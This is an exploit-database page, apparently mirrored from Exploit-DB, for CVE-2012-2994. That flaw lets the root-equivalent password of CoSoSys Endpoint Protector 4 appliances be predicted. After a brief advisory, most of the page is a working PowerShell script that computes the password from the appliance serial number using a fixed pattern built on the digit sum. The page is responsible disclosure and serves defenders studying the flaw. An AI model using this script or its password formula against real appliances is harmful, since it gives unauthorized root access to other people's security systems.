Lucene search
+L

CoSoSys Endpoint Protector - Predictable Password Generation

🗓️ 17 Sep 2012 00:00:00Reported by Christopher CampbellType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 41 Views

CoSoSys Endpoint Protector vulnerable to predictable password generatio

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2012-2994
17 Sep 201200:00
circl
Tenable Nessus
CoSoSys Endpoint Protector 4 Predictable Password
16 Nov 201200:00
nessus
CVE
CVE-2012-2994
18 Sep 201201:00
cve
Cvelist
CVE-2012-2994
18 Sep 201201:00
cvelist
EUVD
EUVD-2012-2972
7 Oct 202500:30
euvd
NVD
CVE-2012-2994
18 Sep 201203:48
nvd
Prion
Code injection
18 Sep 201203:48
prion
CERT
CoSoSys Endpoint Protector 4 appliance contains a predictable password for root-equivalent account vulnerability
17 Sep 201200:00
cert
source: https://www.securityfocus.com/bid/55570/info

CoSoSys Endpoint Protector is prone to an insecure password generation vulnerability.

Successfully exploiting this issue may allow an attacker to guess generated passwords and gain access to affected appliances.

CoSoSys Endpoint Protector 4 is vulnerable; other versions may also be affected.

function Get-EPPPassword {
<#
.Synopsis

 Get-EPPPassword calculates the predictable root password for Cososys Endpoint Protector 4 servers.
 Author: Chris Campbell (@obscuresec)
 License: BSD 3-Clause

.Description

 Get-EPPPassword Timeline:
  discovered            3 Mar 2012
  reported to vendor   12 Jun 2012
  reported to US-CERT  15 Jul 2012
  released             17 Sep 2012

.Example

 Get-EPPPassword -Serial 123456789

.Link

 http://obscuresecurity.blogspot.com/2012/09/cososys-predicable-password-cve-2012.html
#>

Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $Serial)

#function to calculate sums from serial number
function GetSerialSum {
 if ($Serial.Length -ne 9) {
        Return "EPP Serial Number is 9 digits"
    }
    else {
 #convert $serial to an array of integers
  [int[]] $SerialArray = [char[]]$Serial| ForEach-Object {[int]"$_"}
   }
 foreach ($Number in $SerialArray) {
            $Sum += $Number
            }
 Write-Output $Sum
}

#function to calculate epproot password
function GetPassword {
 Write-Output "eroot!00$Sums`RO"
 }
$Sums = GetSerialSum
GetPassword
}

Get-EPPPassword -Serial 135792468

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Aug 2015 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 27.5
EPSS0.06269
41